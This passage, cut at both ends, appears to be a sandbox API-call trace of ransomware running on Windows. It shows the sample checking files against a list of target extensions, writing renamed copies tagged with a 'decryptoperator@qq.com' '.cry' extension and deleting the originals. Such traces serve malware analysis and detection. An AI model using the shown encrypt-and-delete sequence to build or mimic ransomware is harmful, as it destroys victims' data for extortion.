Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0048.861] lstrlenW (lpString=".doc") returned 4 [0048.861] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.861] lstrlenW (lpString=".docx") returned 5 [0048.861] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.861] lstrlenW (lpString=".pdf") returned 4 [0048.861] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.861] lstrlenW (lpString=".xls") returned 4 [0048.861] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.861] lstrlenW (lpString=".xlsx") returned 5 [0048.861] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.861] lstrlenW (lpString=".ppt") returned 4 [0048.861] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0048.861] lstrlenW (lpString=".zip") returned 4 [0048.861] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.861] lstrlenW (lpString=".rar") returned 4 [0048.861] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.861] lstrlenW (lpString=".bz2") returned 4 [0048.861] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.861] lstrlenW (lpString=".7z") returned 3 [0048.861] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0048.861] lstrlenW (lpString=".dbf") returned 4 [0048.861] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0048.861] lstrlenW (lpString=".1cd") returned 4 [0048.862] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0048.862] lstrlenW (lpString=".jpg") returned 4 [0048.862] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.863] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=30170) returned 1 [0048.863] CloseHandle (hObject=0x190) returned 1 [0048.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 0x20 [0048.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.863] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.863] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.864] GetLastError () returned 0x0 [0048.864] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x75da, lpOverlapped=0x0) returned 1 [0048.884] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x75e0, lpOverlapped=0x0) returned 1 [0048.886] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.886] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.886] SetEndOfFile (hFile=0x194) returned 1 [0048.886] CloseHandle (hObject=0x194) returned 1 [0048.886] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.886] SetEndOfFile (hFile=0x190) returned 1 [0048.887] CloseHandle (hObject=0x190) returned 1 [0048.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.887] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1 [0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0048.887] lstrlenW (lpString=".doc") returned 4 [0048.888] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.888] lstrlenW (lpString=".docx") returned 5 [0048.888] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.888] lstrlenW (lpString=".pdf") returned 4 [0048.888] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.888] lstrlenW (lpString=".xls") returned 4 [0048.888] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.888] lstrlenW (lpString=".xlsx") returned 5 [0048.888] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.888] lstrlenW (lpString=".ppt") returned 4 [0048.888] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0048.888] lstrlenW (lpString=".zip") returned 4 [0048.888] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.888] lstrlenW (lpString=".rar") returned 4 [0048.888] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.888] lstrlenW (lpString=".bz2") returned 4 [0048.888] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.888] lstrlenW (lpString=".7z") returned 3 [0048.888] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0048.888] lstrlenW (lpString=".dbf") returned 4 [0048.888] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0048.888] lstrlenW (lpString=".1cd") returned 4 [0048.888] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0048.888] lstrlenW (lpString=".jpg") returned 4 [0048.888] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.889] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.889] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.890] GetLastError () returned 0x0 [0048.890] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x51a5b, lpOverlapped=0x0) returned 1 [0048.933] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x51a60, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x51a60, lpOverlapped=0x0) returned 1 [0048.939] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.939] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0048.939] SetEndOfFile (hFile=0x194) returned 1 [0048.939] CloseHandle (hObject=0x194) returned 1 [0048.939] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.939] SetEndOfFile (hFile=0x190) returned 1 [0048.942] CloseHandle (hObject=0x190) returned 1 [0048.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.942] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 1 [0048.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0048.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0048.943] lstrlenW (lpString=".doc") returned 4 [0048.943] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString=".docx") returned 5 [0048.943] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0048.943] lstrlenW (lpString=".pdf") returned 4 [0048.943] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString=".xls") returned 4 [0048.943] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString=".xlsx") returned 5 [0048.943] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0048.943] lstrlenW (lpString=".ppt") returned 4 [0048.943] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0048.943] lstrlenW (lpString=".zip") returned 4 [0048.943] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString=".rar") returned 4 [0048.943] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString=".bz2") returned 4 [0048.943] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.943] lstrlenW (lpString=".7z") returned 3 [0048.943] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0048.943] lstrlenW (lpString=".dbf") returned 4 [0048.943] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0048.943] lstrlenW (lpString=".1cd") returned 4 [0048.943] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0048.943] lstrlenW (lpString=".jpg") returned 4 [0048.943] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0048.944] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=109718) returned 1 [0048.944] CloseHandle (hObject=0x190) returned 1 [0048.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 0x20 [0048.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.944] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.944] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.944] GetLastError () returned 0x0 [0048.944] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1ac96, lpOverlapped=0x0) returned 1 [0048.977] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1aca0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1aca0, lpOverlapped=0x0) returned 1 [0048.979] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.979] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.979] SetEndOfFile (hFile=0x194) returned 1 [0048.979] CloseHandle (hObject=0x194) returned 1 [0048.979] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.979] SetEndOfFile (hFile=0x190) returned 1 [0048.980] CloseHandle (hObject=0x190) returned 1 [0048.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.981] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 1 [0048.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.981] lstrlenW (lpString=".doc") returned 4 [0048.981] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.981] lstrlenW (lpString=".docx") returned 5 [0048.981] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0048.981] lstrlenW (lpString=".pdf") returned 4 [0048.981] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.981] lstrlenW (lpString=".xls") returned 4 [0048.981] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0048.981] lstrlenW (lpString=".xlsx") returned 5 [0048.981] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0048.981] lstrlenW (lpString=".ppt") returned 4 [0048.981] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.981] lstrlenW (lpString=".zip") returned 4 [0048.981] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.981] lstrlenW (lpString=".rar") returned 4 [0048.981] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.981] lstrlenW (lpString=".bz2") returned 4 [0048.981] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.981] lstrlenW (lpString=".7z") returned 3 [0048.981] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.981] lstrlenW (lpString=".dbf") returned 4 [0048.981] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.982] lstrlenW (lpString=".1cd") returned 4 [0048.982] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0048.982] lstrlenW (lpString=".jpg") returned 4 [0048.982] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0048.982] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=72031) returned 1 [0048.982] CloseHandle (hObject=0x190) returned 1 [0048.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 0x20 [0048.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.983] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.983] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.983] GetLastError () returned 0x0 [0048.983] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1195f, lpOverlapped=0x0) returned 1 [0049.000] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x11960, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x11960, lpOverlapped=0x0) returned 1 [0049.001] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0049.001] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.001] SetEndOfFile (hFile=0x194) returned 1 [0049.002] CloseHandle (hObject=0x194) returned 1 [0049.002] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.002] SetEndOfFile (hFile=0x190) returned 1 [0049.003] CloseHandle (hObject=0x190) returned 1 [0049.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.003] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 1 [0049.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.003] lstrlenW (lpString=".doc") returned 4 [0049.003] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.003] lstrlenW (lpString=".docx") returned 5 [0049.003] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1 [0049.003] lstrlenW (lpString=".pdf") returned 4 [0049.003] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.003] lstrlenW (lpString=".xls") returned 4 [0049.003] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.003] lstrlenW (lpString=".xlsx") returned 5 [0049.003] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0049.004] lstrlenW (lpString=".ppt") returned 4 [0049.004] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.004] lstrlenW (lpString=".zip") returned 4 [0049.004] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.004] lstrlenW (lpString=".rar") returned 4 [0049.004] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.004] lstrlenW (lpString=".bz2") returned 4 [0049.004] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.004] lstrlenW (lpString=".7z") returned 3 [0049.004] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.004] lstrlenW (lpString=".dbf") returned 4 [0049.004] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.004] lstrlenW (lpString=".1cd") returned 4 [0049.004] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.004] lstrlenW (lpString=".jpg") returned 4 [0049.004] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.004] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=58026) returned 1 [0049.004] CloseHandle (hObject=0x190) returned 1 [0049.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 0x20 [0049.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0049.005] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0049.005] 